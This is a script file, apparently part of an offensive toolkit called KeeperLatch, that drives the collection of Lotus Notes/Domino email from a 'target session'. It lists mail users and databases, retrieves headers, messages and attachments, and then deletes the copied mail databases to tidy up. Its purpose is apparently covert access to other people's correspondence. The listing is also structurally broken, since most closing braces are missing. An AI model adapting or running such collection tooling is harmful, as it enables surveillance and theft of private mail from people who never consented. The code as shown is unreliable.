187 lines
4.9 KiB
187 lines
4.9 KiB
# File: LotusMail.eps
# Modifications:
# 16 Jan 2004 Created
# 17 May 2004 Modified
# 09 Feb 2005 Modified menu option 3 to list mail users directly
# and changed main menu to retrieve headers, messages,
# or messages with attachments; moved filtering to
# sub-menu.
# 10 May 2005 Removed Set Up Lotus Notes/Domino Environment as a menu option
# Environment is set up once for each target session
# 23 Jan 2006 Added menu option to allow the entering of a single user/database
# 25 Jan 2006 Added menu option to post process mail data
@include "_FileExists.epm";
@include "_RecordToolUse.epm";
@include "Include\\SetupLotus.epm";
@include "Include\\MailUsers.epm";
@include "Include\\MailList.epm";
_RecordToolUse("KeeperLatch", "KeeperLatch-Win32_1.0.4.1");
string $commands;
# commands
$commands[0] = "Quit";
$commands[1] = "Pause";
$commands[2] = "Enter Mail User/Database";
$commands[3] = "List Mail Users/Databases";
$commands[4] = "Retrieve Mail Headers Only";
$commands[5] = "Retrieve Mail Messages With Headers";
$commands[6] = "Retrieve Mail Messages With Headers and Attachments";
#$commands[7] = "Post Process";
bool $LNPathFound=false;
string $dataPath="";
string $destDbName="";
string $dbFile="";
string $firstname="";
string $lastname="";
string $addr = "";
string $dbFileStr="None Selected";
string $usernameStr = "";
string $addrStr = "";
string %idHash;
string $key;
# Set up the Lotus Notes environment if it is not already set up
$dataPath = GetEnv("kl_dataPath");
bool $setup = true;
if ($dataPath=="") {
ifnot (SetupLotusEnv($LNPathFound, $dataPath)) {
echo "* Unable to setup lotus environment";
$setup = false;
else {
SetEnv("kl_lotusPathFound", "$LNPathFound");
SetEnv("kl_dataPath", "$dataPath");
while ($setup) {
$dbFileStr = GetEnv("kl_dbfile");
$usernameStr = GetEnv("kl_username");
$addrStr = GetEnv("kl_internetAddr");
$dataPath = GetEnv("kl_dataPath");
if ($dbFileStr == "") {
$dbFileStr = "None Selected";
string $curMailPath = splitPath($dbFileStr);
echo "\r\nCurrent Mail Database: $dbFileStr [$addrStr]\r\n";
echo "Lotus Notes/Domino Mail Retrieval Options";
echo "";
int $i=0;
# print the command list
while ($i < sizeof($commands)) {
echo "($i). $commands[$i]";
echo "";
int $choice = GetInput("Enter the desired option");
# Quit script
if ($choice == 0) {
# Delete copies of mail database
string $thePath;
string $theFile;
bool $ok;
int $i = 0;
int $mailFileCnt = sizeof($destDbName);
while ($i < $mailFileCnt) {
ifnot ($destDbName[$i] == "") {
if (prompt "\r\nDelete copy of mail database, $destDbName[$i]?") {
$thePath = splitPath($destDbName[$i]);
$theFile = $thePath[1];
$ok = `del "$theFile" -path "$thePath"`;
if ($ok) {
echo "$destDbName[$i] deleted successfully";
if ("$destDbName[$i]" == "$dbFileStr") {
$dbFileStr = "None Selected";
SetEnv("kl_dbfile", "");
SetEnv("kl_internetAddr", "");
$destDbName[$i] = "";
return true;
# Pause script
else if ($choice == 1) {
pause "to allow issuing of other EP commands";
# Change User or Select Mail User from List of Users/Databases
else if (($choice == 2) || ($choice == 3)) {
$LNPathFound = GetEnv("kl_lotusPathFound");
$dataPath = GetEnv("kl_dataPath");
ifnot (LotusMailUsers($LNPathFound, $dataPath, $dbFile, $firstname, $lastname, $addr, $choice)) {
echo "* Unable to list Lotus Notes Mail Users";
else {
undef (%idHash);
# Retrieve Mail Messages
else if (($choice > 3) && ($choice < 7)) {
$LNPathFound = GetEnv("kl_lotusPathFound");
$dataPath = GetEnv("kl_dataPath");
$dbFileStr = GetEnv("kl_dbfile");
if ($dbFileStr=="") {
ifnot (LotusMailUsers($LNPathFound, $dataPath, $dbFile, $firstname, $lastname, $addr, 3)) {
echo "* Unable to list Lotus Notes Mail Users";
else {
foreach $key (keys %idHash) {
%idHash{'$key'} = "";
else {
ifnot (LotusMailList($LNPathFound, $dataPath, $dbFileStr, $choice, %idHash, $destDBName)) {
echo "* Unable to list mail messages";
else {
SetEnv("kl_dbfile", $dbFileStr);
#Post-process the lotusnotesparser xml file
# else if ($choice == 7) {
# if (`script KeeperLatch\\PostProcessCapture.eps`) {
# echo "Post Processing of captured files successful";
# }
# else {
# echo "* Unable to post process captured files";
# }
# }
else {
echo "\r\nInvalid Menu Option -- Try Again\r\n";
return true;